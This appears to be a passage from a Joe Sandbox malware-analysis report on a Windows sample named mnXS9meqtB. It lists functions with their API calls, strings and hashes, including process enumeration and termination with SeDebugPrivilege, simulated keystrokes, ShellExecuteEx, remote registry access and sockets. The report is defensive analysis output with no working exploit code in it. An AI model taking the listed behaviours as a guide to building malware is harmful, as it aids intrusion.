                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X$p2;l2;
                                                                            • API String ID: 774024439-843856899
                                                                            • Opcode ID: 9a996619d63ac11a3e284392a6d7f631a83844efb5be9ac987c4fce0df259b98
                                                                            • Instruction ID: 0c4b0701416bd0f79936d2da6c3bef386a7768589927a05fe9aad9af6f0df1fd
                                                                            • Opcode Fuzzy Hash: 9a996619d63ac11a3e284392a6d7f631a83844efb5be9ac987c4fce0df259b98
                                                                            • Instruction Fuzzy Hash: 33C18D715053409FC726EF64C891F9AB7E4BF85354F00496DF9999B2A2DB30ED08CB82
                                                                            Function 00369A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00369B19
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00369B2D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00369B47
                                                                            • _wcscat.LIBCMT ref: 00369BA2
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00369BB9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00369BE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 480967c2ea38893f2cc52e96671e3affbd3246a564e474713e95948c40f154db
                                                                            • Instruction ID: 2643333ffea2b976097b4c43d14c033729a2d76994dec3b825d8ed4e47c05c7c
                                                                            • Opcode Fuzzy Hash: 480967c2ea38893f2cc52e96671e3affbd3246a564e474713e95948c40f154db
                                                                            • Instruction Fuzzy Hash: F241AD70A00308ABDF229FA4DC85FEA77FCEB08350F11856AF549E7292D6719D84CB64
                                                                            Function 0036172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00346532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00346554
                                                                              • Part of subcall function 00346532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00346564
                                                                              • Part of subcall function 00346532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003465F9
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036179A
                                                                            • GetLastError.KERNEL32 ref: 003617AD
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003617D9
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00361855
                                                                            • GetLastError.KERNEL32(00000000), ref: 00361860
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00361895
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: e7352e637d35eeddf0904205b8590594feb5fcc312a7a1f1858cdf395cdebca7
                                                                            • Instruction ID: 968b7361f96b692b066dda9bdd743c7648df18e40255bb6909d9e3f3a7f74a51
                                                                            • Opcode Fuzzy Hash: e7352e637d35eeddf0904205b8590594feb5fcc312a7a1f1858cdf395cdebca7
                                                                            • Instruction Fuzzy Hash: F941A475600201AFDB07EF54C8E5FAEB7A5AF58310F09C099F9069F2D2DB74A944CB91
                                                                            Function 00345819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 003458B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: 441637a01162c2664d1e3006dd842203355e1aeb89aa42f209361d24128d774d
                                                                            • Instruction ID: d8d3c117d334da3c4ed0bbad8ccac87a28c8b51d5dce3c151359c8baebd0907d
                                                                            • Opcode Fuzzy Hash: 441637a01162c2664d1e3006dd842203355e1aeb89aa42f209361d24128d774d
                                                                            • Instruction Fuzzy Hash: 8111EB32B49756BBE7075A54AC92DEA33DC9F15714B20003AF610AE683EB70BA044264
                                                                            Function 0034A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0034A806
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafeVartype
                                                                            • String ID:
                                                                            • API String ID: 1725837607-0
                                                                            • Opcode ID: a1dfc0d00a75dedfb5ce4f6d3a58b804f37e84765e72fe853944badb547f2c1d
                                                                            • Instruction ID: 50fa06c16c2ba12814762fac146c4a12b6873aa63d9b87efb763c93b4ee09120
                                                                            • Opcode Fuzzy Hash: a1dfc0d00a75dedfb5ce4f6d3a58b804f37e84765e72fe853944badb547f2c1d
                                                                            • Instruction Fuzzy Hash: E8C19D75A4461ADFDB06DF98C481BEEBBF4FF08315F24406AE605EB281D734A941CB91
                                                                            Function 00346B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00346B63
                                                                            • LoadStringW.USER32(00000000), ref: 00346B6A
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00346B80
                                                                            • LoadStringW.USER32(00000000), ref: 00346B87
                                                                            • _wprintf.LIBCMT ref: 00346BAD
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00346BCB
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00346BA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 58514fd0a0011d4c0b875022a1ba703187a9f24e4f260221127cd555f3e9f5f7
                                                                            • Instruction ID: ef786d9f0111b7cf6c142704c9fe94893bd39e801c696fb00f96f5efce010804
                                                                            • Opcode Fuzzy Hash: 58514fd0a0011d4c0b875022a1ba703187a9f24e4f260221127cd555f3e9f5f7
                                                                            • Instruction Fuzzy Hash: 090162F6500318BFEB12AB909D89EF7336CDB04304F004491B745D6081EA749E848F75
                                                                            Function 00362B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00362BF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharConnectRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 2595220575-0
                                                                            • Opcode ID: 761b3d819433c888344bf2d269bce71234f4389a38c3d611da4b38dbff793b61
                                                                            • Instruction ID: 4322ed92e994015ec8bf1f3850119863969015af85aebbf53b0496895d6e951f
                                                                            • Opcode Fuzzy Hash: 761b3d819433c888344bf2d269bce71234f4389a38c3d611da4b38dbff793b61
                                                                            • Instruction Fuzzy Hash: A4918A712042019FCB06EF64C895B6EB7E9FF98310F05885DF9969B2A2DB34E945CF42
                                                                            Function 003595BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • select.WSOCK32 ref: 00359691
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0035969E
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003596C8
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003596E9
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003596F8
                                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 003597AA
                                                                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0039DC00), ref: 00359765
                                                                              • Part of subcall function 0033D2FF: _strlen.LIBCMT ref: 0033D309
                                                                            • _strlen.LIBCMT ref: 00359800
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                            • String ID:
                                                                            • API String ID: 3480843537-0
                                                                            • Opcode ID: 93b871b40e89fccfc126e6d0991e4b4ab762384e6d746d6969051e2283e1fe7b
                                                                            • Instruction ID: f1f8aa71b4aa367d81800791539462e979cd7c84c88d06dc87866180c83c71e8
                                                                            • Opcode Fuzzy Hash: 93b871b40e89fccfc126e6d0991e4b4ab762384e6d746d6969051e2283e1fe7b
                                                                            • Instruction Fuzzy Hash: A981AE71504200ABC716EF64CC95FABB7E8EF89714F104A1EF9559B2E1EB70D908CB92
                                                                            Function 0032A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __mtinitlocknum.LIBCMT ref: 0032A991
                                                                              • Part of subcall function 00327D7C: __FF_MSGBANNER.LIBCMT ref: 00327D91
                                                                              • Part of subcall function 00327D7C: __NMSG_WRITE.LIBCMT ref: 00327D98
                                                                              • Part of subcall function 00327D7C: __malloc_crt.LIBCMT ref: 00327DB8
                                                                            • __lock.LIBCMT ref: 0032A9A4
                                                                            • __lock.LIBCMT ref: 0032A9F0
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003B6DE0,00000018,00335E7B,?,00000000,00000109), ref: 0032AA0C
                                                                            • EnterCriticalSection.KERNEL32(8000000C,003B6DE0,00000018,00335E7B,?,00000000,00000109), ref: 0032AA29
                                                                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 0032AA39
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                            • String ID:
                                                                            • API String ID: 1422805418-0
                                                                            • Opcode ID: c2555286d82d843a2cef966e489dba2547f59c5cfaad3f06093311ada9c64d08
                                                                            • Instruction ID: e9b12ac200ab619a73f022efd4fb7b5ad7746be3140ef41d0ba24bcdd2b7ffad
                                                                            • Opcode Fuzzy Hash: c2555286d82d843a2cef966e489dba2547f59c5cfaad3f06093311ada9c64d08
                                                                            • Instruction Fuzzy Hash: DF413A71900B259BEB169F68FA4575CB7B4BF01335F118219E425EF2E1D7749940CB82
                                                                            Function 00368ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00368EE4
                                                                            • GetDC.USER32(00000000), ref: 00368EEC
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00368EF7
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00368F03
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00368F3F
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00368F50
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0036BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00368F8A
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00368FAA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 4e51324efd1c5d0e31e3df6b85538b3188272eb68b5fe653be69328ae134db32
                                                                            • Instruction ID: e3a01c83949b9c87f2fa1446e85e4187b127859ba3d563b6eb3d22ed38d26b24
                                                                            • Opcode Fuzzy Hash: 4e51324efd1c5d0e31e3df6b85538b3188272eb68b5fe653be69328ae134db32
                                                                            • Instruction Fuzzy Hash: 31317C72200214BFEB128F50DC49FAA3BAEEF49711F0541A5FE089E195D6B59841CB70
                                                                            Function 00370133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0037016D
                                                                            • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0037038D
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003703AB
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003703D6
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003703FF
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00370421
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00370440
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                            • String ID:
                                                                            • API String ID: 3356174886-0
                                                                            • Opcode ID: 850e8b2e86571f1bee822ca00a19c8fd9f7d8472c6063037aa0fad7e7e80ce74
                                                                            • Instruction ID: c929ba91c0e49ae8e2c4022bb5941bf4b4d3f088ed0026b9a39baec9459ba2fe
                                                                            • Opcode Fuzzy Hash: 850e8b2e86571f1bee822ca00a19c8fd9f7d8472c6063037aa0fad7e7e80ce74
                                                                            • Instruction Fuzzy Hash: 94A1AF35600616EBEB2ECF68C9857BDBBB5BF08700F05C155EC58AB291D778AD60CB90
                                                                            Function 0031AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca0e142d7596c6e4a53caee92d57a3578389915b4c4df0a40eeaf156ede8ae3b
                                                                            • Instruction ID: 5dd1350833ab1048c68a2f53f2d5202140a94c7861ef0afd7b4cbcbd05bc2274
                                                                            • Opcode Fuzzy Hash: ca0e142d7596c6e4a53caee92d57a3578389915b4c4df0a40eeaf156ede8ae3b
                                                                            • Instruction Fuzzy Hash: 65718EB0901509EFCB1ACF98CC48AEEBB79FF89311F148149F915AA251C3349A52CF61
                                                                            Function 00362230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0036225A
                                                                            • _memset.LIBCMT ref: 00362323
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00362368
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                              • Part of subcall function 0031C6F4: _wcscpy.LIBCMT ref: 0031C717
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0036242F
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0036243E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 4082843840-2766056989
                                                                            • Opcode ID: 9b1911bb20c0b63c731dd51364350d0c0dee5519c15fcb2e085d467340f7ed8b
                                                                            • Instruction ID: cb1d831895be6571cf3930926137393eb4af3af236e198b07fe470e8ec91c242
                                                                            • Opcode Fuzzy Hash: 9b1911bb20c0b63c731dd51364350d0c0dee5519c15fcb2e085d467340f7ed8b
                                                                            • Instruction Fuzzy Hash: 1E716F74A006199FCF06EFA4C995AAEBBF5FF48310F118459E855AB391CB34AD40CF94
                                                                            Function 00343BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 00343C02
                                                                            • GetKeyboardState.USER32(?), ref: 00343C17
                                                                            • SetKeyboardState.USER32(?), ref: 00343C78
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00343CA4
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00343CC1
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00343D05
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00343D26
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 291830c9f6a722705c65fbcd4a91d2aeb366a02f6022e99a95fbae3b84044d77
                                                                            • Instruction ID: e053f94dbca3b7cc806cff2ae4c226282bce67502b2654e63c6823c4e02f4f9a
                                                                            • Opcode Fuzzy Hash: 291830c9f6a722705c65fbcd4a91d2aeb366a02f6022e99a95fbae3b84044d77
                                                                            • Instruction Fuzzy Hash: A751B3A09047D539FB3787648C55BBABFE9AB06304F088489E0D55F8C2D694FE94D760
                                                                            Function 00368FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00368FE7
                                                                            • GetWindowLongW.USER32(00D1EDF8,000000F0), ref: 0036901A
                                                                            • GetWindowLongW.USER32(00D1EDF8,000000F0), ref: 0036904F
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00369081
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003690AB
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 003690BC
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003690D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
